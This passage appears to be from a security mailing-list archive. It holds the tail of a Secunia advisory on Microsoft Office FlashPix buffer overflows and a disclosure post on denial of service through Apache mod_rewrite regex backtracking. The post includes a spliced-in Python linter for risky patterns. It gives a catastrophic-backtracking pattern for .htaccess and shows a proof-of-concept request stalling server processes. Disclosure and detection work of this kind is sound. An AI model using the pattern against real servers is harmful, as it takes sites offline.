Secunia Research has discovered two vulnerabilities in Microsoft 
Office, which can be exploited by malicious people to compromise a 
user's system.

1) A boundary error in the FlashPix graphics filter when parsing 
certain tile data can be exploited to cause a data section buffer 
overflow via a specially crafted image.

2) A boundary error in the FlashPix graphics filter when parsing 
certain tile data can be exploited to cause a stack-based buffer 
overflow via a specially crafted image.

Successful exploitation of the vulnerabilities allows execution of 
arbitrary code.

== 
5) Solution 

Apply patches provided by MS10-105.

== 
6) Time Table 

27/07/2009 - Vendor notified.
27/07/2009 - Vendor response.
19/08/2009 - Vendor provides status update.
24/09/2009 - Vendor provides status update.
27/10/2009 - Vendor provides status update.
08/12/2009 - Vendor provides status update.
29/01/2010 - Vendor provides status update.
30/04/2010 - Vendor provides status update (tentatively targeting 
 August 2010).
23/07/2010 - Vendor provides status update (slipped from August 2010 
 release and now scheduled for November 2010).
04/11/2010 - Vendor provides status update (slipped from November 2010
 release and now scheduled for December 2010).
08/11/2010 - Vendor informed that this is the final deadline.
14/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Dyon Balding, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-3952 for the vulnerabilities.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-32/

Complete list of vulnerability reports published by Secunia Research:

[Full-disclosure] Apache Insecure mod_rewrite PCRE Resource Exhaustion

2010-12-20 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ Apache Insecure mod_rewrite PCRE Resource Exhaustion ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 19.09.2010
- - Pub.: 21.12.2010

Affected (tested):
- - NetBSD 5.0.2 (Apache 2.2.17 PHP 5.3.4)
- - Ubuntu 10.10 (Apache 2.2.16 PHP 5.3.3)

Original URL:
http://securityreason.com/achievement_securityalert/92


- --- 0.Description ---
The Apache HTTP Server, commonly referred to as Apache, is web server
software notable for playing a key role in the initial growth of the
World Wide Web. In 2009 it became the first web server software to
surpass the 100 million web site milestone.

The PCRE(Perl Compatible Regular Expressions) library is a set of
functions that implement regular expression pattern matching using the
same syntax and semantics as Perl 5. PCRE has its own native API, as
well as a set of wrapper functions that correspond to the POSIX regular
expression API. The PCRE library is free, even for building proprietary
software.


- --- 1. Apache Insecure mod_rewrite PCRE Resource Exhaustion ---
Using mod_rewrite with the PCRE library can be dangerous for the
stability of an Apache server. Everybody knows that PCRE regular
expressions carry a risk of DoS attacks, and that using many regular
expressions in .htaccess is not a good idea.
I will show a possible DoS attack using .htaccess. Of course we can
try to configure our machine to be safe; anyway, many servers are
affected by this.

Many regular expression engines have no limit on how much work a single
match may execute. Example:

Let's see what happens in Firefox with this expression:

.*.*.*(\w+)$1

Nothing special.

Try this:

.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*(\w+)$1

The result in Firefox's JavaScript engine:
Warning: Unresponsive script

Long execution in PCRE generates the "Unresponsive script" warning. The
same algorithm can be used in .htaccess.
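
The difference between the two expressions above is the number of unbounded quantifiers a backtracking matcher has to juggle when the tail of the pattern fails to match. The following is an added example, not Apache's or PCRE's code: a Python check that scans .htaccess-style RewriteRule and RewriteCond lines, counts the unbounded quantifiers in each pattern, and sizes the worst-case number of ways a backtracking engine can split an input among them, so that the 21-quantifier pattern is flagged while ordinary rules are not. The sample .htaccess, the threshold and the directive parsing are constructed for this example.

```python
"""Heuristic check of mod_rewrite patterns for heavy PCRE backtracking.

Added example, not Apache's or PCRE's code: it scans .htaccess-style RewriteRule and
RewriteCond lines, counts unbounded quantifiers, and sizes the worst-case number of ways
a backtracking matcher can split an input among them. The sample .htaccess, the threshold
and the directive parsing are constructed for this example.
"""
import math
import re

# RewriteRule Pattern Substitution [flags]  /  RewriteCond TestString CondPattern [flags]
DIRECTIVE = re.compile(r"^\s*(RewriteRule|RewriteCond)\s+(\S+)\s+(\S+)", re.I)
# '*' or '+' quantifiers that are not escaped literals.
QUANTIFIER = re.compile(r"(?<!\\)[*+]")

# Constructed sample: the two patterns quoted in the advisory next to ordinary rules.
SAMPLE_HTACCESS = r"""
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.example\.org$ [NC]
RewriteRule ^article/([0-9]+)/?$ article.php?id=$1 [L]
RewriteRule .*.*.*(\w+)$1 /index.php [L]
RewriteRule .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*(\w+)$1 /index.php [L]
"""


def unbounded_quantifiers(pattern: str) -> int:
    """Number of '*'/'+' quantifiers in a pattern; each one is a point the matcher can
    backtrack to when a later part of the pattern fails."""
    return len(QUANTIFIER.findall(pattern))


def worst_case_splits(k: int, length: int) -> int:
    """Upper bound on how many ways k greedy unbounded quantifiers can divide an input of
    the given length among themselves: the number of k-tuples of non-negative lengths
    summing to at most `length`, which is C(length + k, k). A backtracking matcher
    explores these on a non-matching input, so the bound is polynomial of degree k."""
    return math.comb(length + k, k)


def lint_htaccess(text: str, threshold: int = 5, sample_length: int = 40):
    """Return (line number, pattern, quantifier count, worst-case splits) for each
    rewrite pattern with at least `threshold` unbounded quantifiers."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue
        directive, first, second = m.group(1).lower(), m.group(2), m.group(3)
        # RewriteRule carries its pattern first; RewriteCond carries it second.
        pattern = first if directive == "rewriterule" else second
        k = unbounded_quantifiers(pattern)
        if k >= threshold:
            findings.append((lineno, pattern, k, worst_case_splits(k, sample_length)))
    return findings


if __name__ == "__main__":
    for lineno, pattern, k, splits in lint_htaccess(SAMPLE_HTACCESS):
        print("line %d: %d unbounded quantifiers, up to %.2e split attempts on a 40-char "
              "input: %s" % (lineno, k, splits, pattern))
```

For a 40-character input the three-quantifier pattern bounds out at C(43, 3) = 12341 split attempts, which is why the advisory calls it "nothing special", while the 21-quantifier version is above 10^15, which is the difference between a fast rejection and a child process pinned at 100% CPU. The count is a heuristic (it ignores anchoring and whether adjacent atoms overlap), so treat a flag as a prompt to rewrite the rule with anchors and specific character classes, not as proof of a problem.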

$ httpd -v && php -v
Server version: Apache/2.2.17 (Unix)
Server built:   Nov 11 2010 19:51:37
PHP 5.3.4 (cli) (built: Nov 11 2010 17:17:35)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
$ pwd && ls -la
/home/cx/public_html
total 4
drwxrwxrwx   2 cx  cx  512 Dec 19 01:10 .
drwxr-xr-x  12 cx  wheel  1024 Dec 19 01:10 ..
$ vi poc.php
$ ls -la .
total 8
drwxrwxrwx   2 cx  cx  512 Dec 19 01:16 .
drwxr-xr-x  12 cx  wheel  1024 Dec 19 01:10 ..
- -rw-r--r--   1 cx  cx 2665 Dec 19 01:18 poc.php


and a remote request to poc.php:
c...@cx64:~$ curl http://172.16.124.128/~cx/poc.php

On the server, every Apache child stalls in .htaccess processing
(mod_rewrite = PCRE):

# ps -aux -U www
USER PID %CPU %MEM   VSZ   RSS TTY STAT STARTEDTIME COMMAND
www  503 13.8  2.4 35620 27420 ?   R 1:19AM 0:04.94
/usr/pkg/sbin/httpd -k start
www  414  9.6  2.3 33572 25400 ?   R 1:20AM 0:03.24
/usr/pkg/sbin/httpd -k start
www  474  7.9  2.2 32548 24544 ?   R 1:19AM 0:02.17
/usr/pkg/sbin/httpd -k start
www  345  6.5  2.1 31524 23888 ?   R 1:19AM 0:01.79
/usr/pkg/sbin/httpd -k start
www  482  7.0  1.9 29476 21536 ?   R 1:22AM 0:00.94
/usr/pkg/sbin/httpd -k start
www  495  4.6  2.0 30500 22944 ?   R 1:19AM 0:01.24
/usr/pkg/sbin/httpd -k start
www  844  3.2  0.5 11980  5280 ?   S 1:22AM 0:00.94
/usr/pkg/libexec/cgi-bin/php
www  289  2.2  1.0 19236 10888 ?   R 1:22AM 0:00.23
/usr/pkg/sbin/httpd -k start
www  859  3.2  1.5 25380 17220 ?   R 1:22AM 0:00.44
/usr/pkg/sbin/httpd -k start
www  337  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  502  0.0  0.3 11988  3252 ?   S 1:19AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  543  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  554  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  754  0.0  0.4 12068  3940 ?   S 1:19AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  955  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  979  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
# ps -aux -U www
USER  PID %CPU %MEM   VSZ   RSS TTY STAT STARTEDTIME COMMAND
www   389  4.0  1.9 29476 21360 ?   R 1:22AM 0:00.80
/usr/pkg/sbin/httpd -k start
www   455  4.3  1.8 28452 20080 ?   R 1:22AM 0:00.55
/usr/pkg/sbin/httpd -k start
www   712  4.9  1.8 27428 19688 ?   R 1:22AM 0:00.51
/usr/pkg/sbin/httpd -k start
www   516  3.8  2.1 31524 23632 ?   R 1:22AM 0:02.05
/usr/pkg/sbin/httpd -k start
...
www  1011  2.3  2.0 30500 21980 ?   R 1:22AM 0:01.16
/usr/pkg/sbin/httpd -k start
www   398  0.0  0.3 12068  3156 ?   S 1:23AM 0:00.01
/usr/pkg/sbin/httpd -k start
www   400  0.0  0.3 12068  3156 ?   S 1:23AM 0:00.01
/usr/pkg/sbin/httpd -k start
www   502  0.0  0.3 11988  3252 ?   I 1:19AM 0:00.01
/usr/pkg/sbin/httpd -k start
www   653  0.0  0.3 12068  3156 ?   S 1:23AM 0:00.01
/usr/pkg/sbin/httpd -k start
www   754  0.0  0.4 12068  3940 ?   I 1:19AM 0:00.01
/usr/pkg/sbin/httpd -k